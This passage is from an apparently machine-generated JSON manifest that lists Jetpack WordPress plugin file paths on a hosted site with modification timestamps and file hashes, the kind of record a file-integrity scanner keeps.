/sites-posts-featured-media-url.php\":{\"d\":1567815230,\"h\":\"15127d735b611739df7cd110bcad4667\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/_inc\\/lib\\/core-api\\/wpcom-fields\\/post-fields-publicize-connections.php\":{\"d\":1567815230,\"h\":\"622c6a57439eb98463b8f4403625bcde\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/_inc\\/lib\\/core-api\\/wpcom-fields\\/attachment-fields-videopress.php\":{\"d\":1567815230,\"h\":\"db5af05e9cde537e3a2d9b1a673ae894\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/_inc\\/lib\\/core-api\\/class.jetpack-core-api-xmlrpc-consumer-endpoint.php\":{\"d\":1567815230,\"h\":\"8a3eca785742f513cb6b18b8b5461a9b\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/_inc\\/lib\\/core-api\\/class.jetpack-core-api-widgets-endpoints.php\":{\"d\":1567815230,\"h\":\"6310a800b895fd360b748a3c582a559f\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/_inc\\/lib\\/core-api\\/class.jetpack-core-api-site-endpoints.php\":{\"d\":1567815230,\"h\":\"9967b511085beda781d6c415e50683b6\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/_inc\\/lib\\/core-api\\/load-wpcom-endpoints.php\":{\"d\":1567815230,\"h\":\"0ffbad23afcf5c77b5ec45f954fa3ab2\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/_inc\\/lib\\/core-api\\/class-wpcom-rest-field-controller.php\":{\"d\":1567815230,\"h\":\"6ed1629d15c454c6b71d3f589d860f3c\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/_inc\\/lib\\/core-api\\/class.jetpack-core-api-module-endpoints.php\":{\"d\":1567815230,\"h\":\"7edf3dc85dd231e24314a41cc3544343\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/_inc\\/lib\\/jetpack-wpes-query-builder\\/jetpack-wpes-query-builder.php\":{\"d\":1567815230,\"h\":\"7ebcdc5b910d133516f5164c1020e974\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/_inc\\/lib\\/jetpack-wpes-query-builder\\/jetpack-wpes-query-parser.php\":{\"d\":1567815230,\"h\":\"303b2f88736a94acc5266050267c3e02\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/_inc\\/lib\\/debugger\\/class-jetpack-debug-data.php\":{\"d\":1567815230,\"h\":\"2f2f013acf95cc24c8d0f3eb9eff78ac\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/_inc\\/lib\\/debugger\\/class-jetpack-cxn-test-base.php\":{\"d\":1567815230,\"h\":\"d98f0a794ecf747378351811a915ca2e\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/_inc\\/lib\\/debugger\\/debug-functions-for-php53.php\":{\"d\":1567815230,\"h\":\"1676987ad018ad1b42f8e6a1f93842da\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/_inc\\/lib\\/debugger\\/0-load.php\":{\"d\":1567815230,\"h\":\"e796c0d86e7bbb2571d2b1a7404e76ab\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/_inc\\/lib\\/debugger\\/class-jetpack-cxn-tests.php\":{\"d\":1567815230,\"h\":\"9388c97e323e61bd8946cf0e358f73c2\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/_inc\\/lib\\/debugger\\/class-jetpack-debugger.php\":{\"d\":1567815230,\"h\":\"30b7bc499e3cac96e2a08a0953a9ae90\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/_inc\\/lib\\/class.color.php\":{\"d\":1567815230,\"h\":\"c2499fa5508c8d5f8fd74add4b9bb64d\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/_inc\\/lib\\/widgets.php\":{\"d\":1567815230,\"h\":\"f2aea693448e9317c459b6dd2ddbe67f\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/_inc\\/lib\\/class.media-summary.php\":{\"d\":1567815230,\"h\":\"d814d2f410bbdd4d180cf3a69346d1a3\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/_inc\\/lib\\/class.jetpack-keyring-service-helper.php\":{\"d\":1567815230,\"h\":\"682368562c6cb74d8d4fb50d54f19e6d\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/_inc\\/lib\\/class.media-extractor.php\":{\"d\":1567815230,\"h\":\"8947a3eea1df34ff05fec5ba742e64b9\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/_inc\\/lib\\/class.jetpack-iframe-embed.php\":{\"d\":1567815230,\"h\":\"345d699e9d4dafbbb3618df665a13913\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/_inc\\/lib\\/class.jetpack-automatic-install-skin.php\":{\"d\":1567815230,\"h\":\"a51b8b939b548e311965a94f8d19efc9\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/_inc\\/lib\\/class.jetpack-photon-image.php\":{\"d\":1567815230,\"h\":\"337b72d7b0be632cf5f4832e8c22623e\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/_inc\\/lib\\/functions.wp-notify.php\":{\"d\":1567815230,\"h\":\"3bfaa28081526db336236a13d8116066\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/_inc\\/lib\\/icalendar-reader.php\":{\"d\":1567815230,\"h\":\"5be31320fe42c46827c88efff3f20a25\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/_inc\\/lib\\/plugins.php\":{\"d\":1567815230,\"h\":\"93a6c0ddebdfbde6d1b0fc175e4d28aa\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/_inc\\/lib\\/class.jetpack-photon-image-sizes.php\":{\"d\":1567815230,\"h\":\"d789ed90089d8edbb9d725b6fa8e185a\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/_inc\\/lib\\/class.media.php\":{\"d\":1567815230,\"h\":\"4986204f617b1098e7af97427813a573\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/_inc\\/lib\\/tonesque.php\":{\"d\":1567815230,\"h\":\"fbafee9db4ff9cc979a8def099de9cbf\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/_inc\\/lib\\/components.php\":{\"d\":1567815230,\"h\":\"b0005077135b2d21bde264b409c79942\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/_inc\\/lib\\/class.jetpack-search-performance-logger.php\":{\"d\":1567815230,\"h\":\"e62654ad8629addca8a4262fed169ff9\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/_inc\\/lib\\/class.core-rest-api-endpoints.php\":{\"d\":1567815230,\"h\":\"6c2989d562e8410b538107b448edbada\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/_inc\\/lib\\/plans.php\":{\"d\":1567815230,\"h\":\"e5dda6324cf2d859fa168d597c27d194\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/_inc\\/lib\\/class.jetpack-password-checker.php\":{\"d\":1567815230,\"h\":\"d808d44aea4489d3ca29581b60c3a786\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/_inc\\/jquery.spin.js\":{\"d\":1567815230,\"h\":\"9d7277fc13a0c90ba1fef6e5fc2341b3\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/_inc\\/jquery.jetpack-resize.js\":{\"d\":1567815230,\"h\":\"a7e428d50878d18e6dfd36e409db9692\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/_inc\\/genericons.php\":{\"d\":1567815230,\"h\":\"db642aa97ec3122ddb8d31bce31fd323\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/_inc\\/idc-notice.js\":{\"d\":1567815230,\"h\":\"4922d411b47005cf37de40cbf6cb0c27\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/_inc\\/social-logos.php\":{\"d\":1567815230,\"h\":\"7f32ba61f85763fa6b2b4feadb0526e8\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/_inc\\/jetpack-connection-banner.js\":{\"d\":1567815230,\"h\":\"5123bb64cb3d7ae8c505cc5aa2b479aa\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/_inc\\/jetpack-modules.views.js\":{\"d\":1567815230,\"h\":\"251913d587f064e0156a457fb05fa936\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/_inc\\/footer.php\":{\"d\":1567815230,\"h\":\"b55608779b3183907007ccba0bc1c6fe\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/_inc\\/crowdsignal-survey.js\":{\"d\":1567815231,\"h\":\"a75d127b4e9b9c4c7878d4702917d472\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/_inc\\/polldaddy-shortcode.js\":{\"d\":1567815231,\"h\":\"db897575b0aa6d8a072bc91ac94578ec\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/_inc\\/jetpack-server-sandbox.php\":{\"d\":1567815230,\"h\":\"ec1ce8c48a8d029a215eb2b0716b55fb\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/_inc\\/class.jetpack-provision.php\":{\"d\":1567815230,\"h\":\"51f47e61fd41050d815df1da926d9e3a\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/_inc\\/jetpack-jitm.js\":{\"d\":1567815230,\"h\":\"a8ad631f4d706354e668a739095ac014\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/_inc\\/crowdsignal-shortcode.js\":{\"d\":1567815231,\"h\":\"3c923220f09886e94c0043c6a5afeade\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/_inc\\/jetpack-modules.js\":{\"d\":1567815231,\"h\":\"0adcd1b0cf921ca071cc5121847d5c29\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/_inc\\/connect-button.js\":{\"d\":1567815230,\"h\":\"93eade048f62a0fd8b29f70cd944ba6a\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/_inc\\/twitter-timeline.js\":{\"d\":1567815230,\"h\":\"11abb9e42c1418622cc8787485bc07a2\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/_inc\\/accessible-focus.js\":{\"d\":1567815230,\"h\":\"b7aceb02239c26c777c3e82d685ed589\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/_inc\\/jetpack-strings.php\":{\"d\":1567815231,\"h\":\"568fe78bf4e849ee62977615b55e619f\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/_inc\\/facebook-embed.js\":{\"d\":1567815230,\"h\":\"fe27ab5834ca5bd26ccac822eb1fa70a\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/_inc\\/jetpack-admin.js\":{\"d\":1567815230,\"h\":\"8a8f9c36329b4768d5f61ae16bcf5b3a\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/_inc\\/postmessage.js\":{\"d\":1567815230,\"h\":\"eadc5832513d5670884a975c6de10f01\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/_inc\\/gallery-settings.js\":{\"d\":1567815230,\"h\":\"94a38300c7b414247a22e49841e2fd6f\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/_inc\\/header.php\":{\"d\":1567815230,\"h\":\"abc9fdc52f4a5fda286958b61fcd4b43\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/_inc\\/spin.js\":{\"d\":1567815230,\"h\":\"ce24b79426e1ba35fe2cc4abbd3bcf4b\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/_inc\\/jetpack-modules.models.js\":{\"d\":1567815231,\"h\":\"b1a78f1e377c4ecf0bdf15b111a13f73\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/jetpack\\/class.jetpack-json-api-modules-endpoint.php\":{\"d\":1567815231,\"h\":\"74390954355e9b0d50c8c102c4025247\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/jetpack\\/class.jetpack-json-api-themes-delete-endpoint.php\":{\"d\":1567815231,\"h\":\"435599ed712bb98653edbb00a75a042a\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/jetpack\\/class.jetpack-json-api-plugins-new-endpoint.php\":{\"d\":1567815231,\"h\":\"4ba89ee911a12fb44798613ee1366caf\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/jetpack\\/class.jetpack-json-api-plugins-get-endpoint.php\":{\"d\":1567815231,\"h\":\"e471e05f167a04382cf877802c73fd9a\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/jetpack\\/class.jetpack-json-api-core-modify-endpoint.php\":{\"d\":1567815231,\"h\":\"6efedb11cfa39121abbb7ce7220839a6\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/jetpack\\/class.jetpack-json-api-get-user-backup-endpoint.php\":{\"d\":1567815231,\"h\":\"060515416c06c2c185db7adbc51ef342\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/jetpack\\/class.jetpack-json-api-modules-list-endpoint.php\":{\"d\":1567815231,\"h\":\"3fb406bc70cfe330e70cb1b620e41e7a\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/jetpack\\/class.jetpack-json-api-themes-modify-endpoint.php\":{\"d\":1567815231,\"h\":\"3798c5ea323d81311dddd5bd5abffa9c\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/jetpack\\/class.jetpack-json-api-themes-endpoint.php\":{\"d\":1567815231,\"h\":\"5e45dae4b74d019da0fd7635a8b120b4\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/jetpack\\/class.wpcom-json-api-update-option-endpoint.php\":{\"d\":1567815231,\"h\":\"e5142b781c268c0597659f11771fcc71\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/jetpack\\/class.jetpack-json-api-get-comment-backup-endpoint.php\":{\"d\":1567815231,\"h\":\"c5848a9168748f490e0a38e860c69e95\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/jetpack\\/class.jetpack-json-api-themes-new-endpoint.php\":{\"d\":1567815231,\"h\":\"5eb0038fc8f4de0813a5d36e9cd743e4\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/jetpack\\/class.jetpack-json-api-plugins-endpoint.php\":{\"d\":1567815231,\"h\":\"81e9fa089d4ef29f2273795f123e193a\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/jetpack\\/class.jetpack-json-api-log-endpoint.php\":{\"d\":1567815231,\"h\":\"7f6ad24ab8e25922ddd5e4e0cfe0a74d\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/jetpack\\/class.jetpack-json-api-user-connect-endpoint.php\":{\"d\":1567815231,\"h\":\"6abcb3984db5f5a81d43a789fbe8cb83\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/jetpack\\/class.jetpack-json-api-cron-endpoint.php\":{\"d\":1567815231,\"h\":\"6f836e0803bc9daa6d718c72317f60f1\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/jetpack\\/class.jetpack-json-api-plugins-modify-endpoint.php\":{\"d\":1567815231,\"h\":\"dfc59cea83658ebfe2270821016bbfca\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/jetpack\\/class.jetpack-json-api-maybe-auto-update-endpoint.php\":{\"d\":1567815231,\"h\":\"f952ec255078c1c2523eb3044f2e30fc\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/jetpack\\/class.jetpack-json-api-endpoint.php\":{\"d\":1567815231,\"h\":\"b5ca6a6c15a004d81691e65df3bb9a97\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/jetpack\\/class.jetpack-json-api-modules-get-endpoint.php\":{\"d\":1567815231,\"h\":\"e1c70e8b57d665ce7c7e48f62a9d49ca\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/jetpack\\/class.jetpack-json-api-user-create-endpoint.php\":{\"d\":1567815231,\"h\":\"a4730761ddd532cc5d2a0f5d202f261d\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/jetpack\\/class.jetpack-json-api-check-capabilities-endpoint.php\":{\"d\":1567815231,\"h\":\"978e8329887c572b7abdacc134843fc3\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/jetpack\\/class.jetpack-json-api-get-database-object-backup-endpoint.php\":{\"d\":1567815231,\"h\":\"cf8c970b34bbd63b99eaa3dc1662e06c\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/jetpack\\/class.jetpack-json-api-plugins-install-endpoint.php\":{\"d\":1567815231,\"h\":\"ab9059c163919a79c6c11aadff4a549b\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/jetpack\\/class.jetpack-json-api-updates-status-endpoint.php\":{\"d\":1567815231,\"h\":\"176a30329574f95414fe3171f99ece4b\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/jetpack\\/json-api-jetpack-endpoints.php\":{\"d\":1567815231,\"h\":\"df43f4c7f9ecde8b00b3047eb7d00e95\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/jetpack\\/class.jetpack-json-api-plugins-modify-v1-2-endpoint.php\":{\"d\":1567815231,\"h\":\"b8222509599d61d866bf6dfac389a246\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/jetpack\\/class.jetpack-json-api-jps-woocommerce-connect-endpoint.php\":{\"d\":1567815231,\"h\":\"eb429d1230b79b764d025ed452fbd383\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/jetpack\\/class.wpcom-json-api-get-option-endpoint.php\":{\"d\":1567815231,\"h\":\"551d85dc5527e776c6fe5d54b15b891f\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/jetpack\\/class.jetpack-json-api-get-post-backup-endpoint.php\":{\"d\":1567815231,\"h\":\"8c13afe04a2137fc5f823bdced4bce64\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/jetpack\\/class.jetpack-json-api-sync-endpoint.php\":{\"d\":1567815231,\"h\":\"1b5327134c4a1fecb87b9d37c2a225a1\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/jetpack\\/class.jetpack-json-api-themes-get-endpoint.php\":{\"d\":1567815231,\"h\":\"c96bc3b296a2310d365e1725d9b3c504\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/jetpack\\/class.jetpack-json-api-translations-modify-endpoint.php\":{\"d\":1567815231,\"h\":\"0c1abb13730788f2e26394d7f22b5d2f\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/jetpack\\/class.jetpack-json-api-core-endpoint.php\":{\"d\":1567815231,\"h\":\"86fd7b49d355fb274892dbd2a6530b6a\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/jetpack\\/class.jetpack-json-api-themes-list-endpoint.php\":{\"d\":1567815231,\"h\":\"25d0bf55db7378a28f6fd061dbe1a845\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/jetpack\\/class.jetpack-json-api-plugins-delete-endpoint.php\":{\"d\":1567815231,\"h\":\"ca3e8eaa18af1b801d8797a5c9238a6d\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/jetpack\\/class.jetpack-json-api-plugins-list-endpoint.php\":{\"d\":1567815231,\"h\":\"36122f915a96a6d4102cf95c07b57f94\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/jetpack\\/class.jetpack-json-api-translations-endpoint.php\":{\"d\":1567815231,\"h\":\"87ea7757352075bcba747fcca7933c1e\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/jetpack\\/class.jetpack-json-api-modules-modify-endpoint.php\":{\"d\":1567815231,\"h\":\"19f57e52babc040ae6cdecc996a7295d\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/jetpack\\/class.jetpack-json-api-get-option-backup-endpoint.php\":{\"d\":1567815231,\"h\":\"14fafb2db68e8811dd0ae17b93d32abb\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/jetpack\\/class.jetpack-json-api-themes-active-endpoint.php\":{\"d\":1567815231,\"h\":\"0380a824d04ac5f873d50e2d745bd690\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/jetpack\\/class.jetpack-json-api-themes-install-endpoint.php\":{\"d\":1567815231,\"h\":\"a5cdc307271938d5c776950fad5c7f33\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/jetpack\\/class.jetpack-json-api-get-term-backup-endpoint.php\":{\"d\":1567815231,\"h\":\"9de6a9dabc1d42f8889c2e2874aceca8\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/class.wpcom-json-api-update-comment-endpoint.php\":{\"d\":1567815231,\"h\":\"b0ba3eda67e6aa37c3fc2f6937719ae3\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/class.wpcom-json-api-update-site-logo-endpoint.php\":{\"d\":1567815231,\"h\":\"062c2a1d5639f24744c7863f276e95cf\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/class.wpcom-json-api-list-posts-endpoint.php\":{\"d\":1567815231,\"h\":\"4416627b2e6b49485de797bc34c498c6\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/class.wpcom-json-api-site-settings-v1-3-endpoint.php\":{\"d\":1567815231,\"h\":\"364f39d52b76a30712c814149eae2c64\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/class.wpcom-json-api-get-comments-tree-endpoint.php\":{\"d\":1567815231,\"h\":\"2c781931fdc2cb3cf784b6b629538388\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/class.wpcom-json-api-update-post-endpoint.php\":{\"d\":1567815231,\"h\":\"0faa32e2db69244bee611ed64f05ca0a\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/class.wpcom-json-api-get-customcss.php\":{\"d\":1567815231,\"h\":\"0cdab3a6a43d2927be2703fef356aa91\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/class.wpcom-json-api-bulk-update-comments-endpoint.php\":{\"d\":1567815231,\"h\":\"03f8f409a176f91dece84b4c110919ea\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/class.wpcom-json-api-render-embed-endpoint.php\":{\"d\":1567815231,\"h\":\"e70c60819824d64cf6d40eaef49dc515\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/class.wpcom-json-api-list-post-type-taxonomies-endpoint.php\":{\"d\":1567815231,\"h\":\"47df9838acaa679d5a435df2d27515ec\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/class.wpcom-json-api-get-term-endpoint.php\":{\"d\":1567815231,\"h\":\"90996bbf381442baa34e38d39b180319\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/class.wpcom-json-api-post-v1-1-endpoint.php\":{\"d\":1567815231,\"h\":\"c62a98a91eec908a8640001192c51370\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/class.wpcom-json-api-list-media-v1-2-endpoint.php\":{\"d\":1567815231,\"h\":\"3cdc0c60ff22f9f19d7067edf8bb9843\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/class.wpcom-json-api-get-media-endpoint.php\":{\"d\":1567815231,\"h\":\"d755fdc055c6f0f7d8d3f6253f1503d1\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/class.wpcom-json-api-list-shortcodes-endpoint.php\":{\"d\":1567815231,\"h\":\"f36ee20ce8c84cc7f15e9d71de90aeff\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/class.wpcom-json-api-get-site-endpoint.php\":{\"d\":1567815231,\"h\":\"5a3392005606ce8e9bb6239e273ac970\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/class.wpcom-json-api-taxonomy-endpoint.php\":{\"d\":1567815231,\"h\":\"68076c7cb3dcea2f8cb916c1e45291e8\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/class.wpcom-json-api-list-embeds-endpoint.php\":{\"d\":1567815231,\"h\":\"92e5130186380dd5a4a3d639987469ce\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\